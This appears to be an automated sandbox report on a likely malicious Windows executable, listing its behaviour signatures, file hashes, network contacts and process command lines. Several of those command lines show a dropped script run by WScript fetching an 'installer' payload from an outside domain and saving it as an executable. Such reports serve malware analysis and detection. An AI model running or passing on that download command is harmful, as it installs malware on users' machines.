Analysis Overview
SHA256
2474e400d8766298dabd46b80780e17c2b5558a8fe42e7f9c5c448a1f7fbfacd
Threat Level: Likely malicious
The file 92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 15:25
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 15:25
Reported
2024-06-03 15:28
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf1A25.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
| MD5 | 39826ea0e12dd1eecf3e4a7fe6476e8a |
| SHA1 | c0f29a159176056e94e1886f1d34f21ccd068570 |
| SHA256 | 2783793adbc862c8692c5b6ced174fb85ab38d00af0fdd163d45d2e449a7fbc9 |
| SHA512 | 9b9520dea50cc6ff5b543b853fcf86b62287624875095973dfae350e8cbe7f18a74403c48074497dec4fe2ae5550b33bd2d3e43619063232708242dffdee09f4 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7WLXX66L.txt
| MD5 | 06119bafda7f53b154e7e99b00ad3766 |
| SHA1 | aae6e77e6fef03de40943866b94c12a4ad8abb1b |
| SHA256 | b3c6f9a9a3fb6dfe8d228a1e4a578aa0ddfb183bda8cf3fe647f71d1ffc16f64 |
| SHA512 | e7aab3f1066a2ee1fa46f01219ea9df937d2d9f491f60ee4bef665914f36ac668e04f9252fd52a67c008a47e34c81a0c23462f75a9ae01a460791bb01220b3b3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | c76c0f6291e1f8ac56b6f8c90581046b |
| SHA1 | 5c908715f588bb0ee5d5b67ba8936783f59e8d2c |
| SHA256 | 781c7697440f29089e0877b663c11292ecaa249c8a9162f6de48f0d6b8e727d7 |
| SHA512 | 9b8c267154e46aca198554a96b1e01c5e3a26744ed3b0893e31355872e9ecc8fd49a7f5ebc9067d8ba3460705e27e1d94e7ab80e259a7049fde1ef26e6f40e08 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 13ed5e0369cedc64c8437eb9a493a981 |
| SHA1 | 880053c91809fef7b2a3d688143f554d5a05c0bd |
| SHA256 | 3560614f2f62c19498d2ad6c3b9fa8f232883167479de05e924a5a3ab19a8454 |
| SHA512 | 18b3c940a3b722b58c476af4141ab987ed9f7557c1e52f3f20548b2c209abd67c943761d22e20ed59c36d69f8cd911285aff7efdf2d20f51c35cad62932aefa0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | b62e6cf518a294ebd2c9e7a924dd93d8 |
| SHA1 | d2e38bd9879ce6473b5d62491cbcf6cee5fef5ef |
| SHA256 | 30c609fdfc81fde8d7bd4afe732cf5ce3e1c4b152ef82847905adb2e27cf7d4a |
| SHA512 | 873dfdffd0f459f4262ac5723fa6922f3a4024849444fec6a547ff1f4b11e1605b735376356ba513465503a474cdd709d6e5af4d4cfc733e93a34a7c03c09ee7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5642455af3a8b6fceda2d380d71592f4 |
| SHA1 | 06c3e4e331df241896cf59bde3e729bee5bc13b2 |
| SHA256 | d799487df1d32dcd1de960b011b781a366460f6341e40b660ab77e9b7062f54c |
| SHA512 | ab88648f640838e33f556ed0c13b71ec561dd9e7e15d6e7e17e408f699578a3391772c3d45d92c532b63c1aa58631b2176d1290a34fdbb6f2597c205d27e65fc |
C:\Users\Admin\AppData\Local\Temp\Cab62A9.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
| MD5 | aea00656a98d0206d9436f6010a86201 |
| SHA1 | 0eeefcd46650d0b0beb654cb1f9b2081624ea770 |
| SHA256 | 9f1260d63b66958cd1b259298f55a0bcb2f2e7384f93a2f3ac359e0b3b66f400 |
| SHA512 | abb7b61bae7a4741fd395ff4433066867f03b75e6a391f14bcf1f0f33cd10740f7665964379086eeea0fa50ca62047195b0e955718f2b6c341808b5bb1d505ab |
C:\Users\Admin\AppData\Local\Temp\Tar7AAD.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
| MD5 | 42831a78f1d148373b1ac7ee7d34ae2b |
| SHA1 | ab4ad09d299c3d347a3e191471c5551e2cd70253 |
| SHA256 | 1980af622bd4c33b490243a5227f934d739b97e8f95a67f9b59b8b964ba80d18 |
| SHA512 | cdc7d34077dbec16a2debaedb9df753f6f201c985435a0a9c4df063a1bf56974ecf47c66f5a0e43090c124c917f6d5ef26e5cf4551a52841fa8086326a9ab655 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
| MD5 | a55b9915d706e965bea9a51dc48296ca |
| SHA1 | 249a82865862b9e72de18f0e6d2e27cf0291d21b |
| SHA256 | 2fd863d987b4dd44f9f666cf6595a48cc12adab7c8bf5c4c7c1b8824ab77c427 |
| SHA512 | 90963764d3f3da91eec0fda35ad806393c9582d937d7e2b553dd7b2d260ff0083daebfef74815b13c1785e1c2ef7265cf3783437b8bb83beffd89bc70355a929 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 15:25
Reported
2024-06-03 15:28
Platform
win10v2004-20240508-en
Max time kernel
92s
Max time network
99s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 113.6.86.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| NL | 52.111.243.29:443 | tcp | |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf399E.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |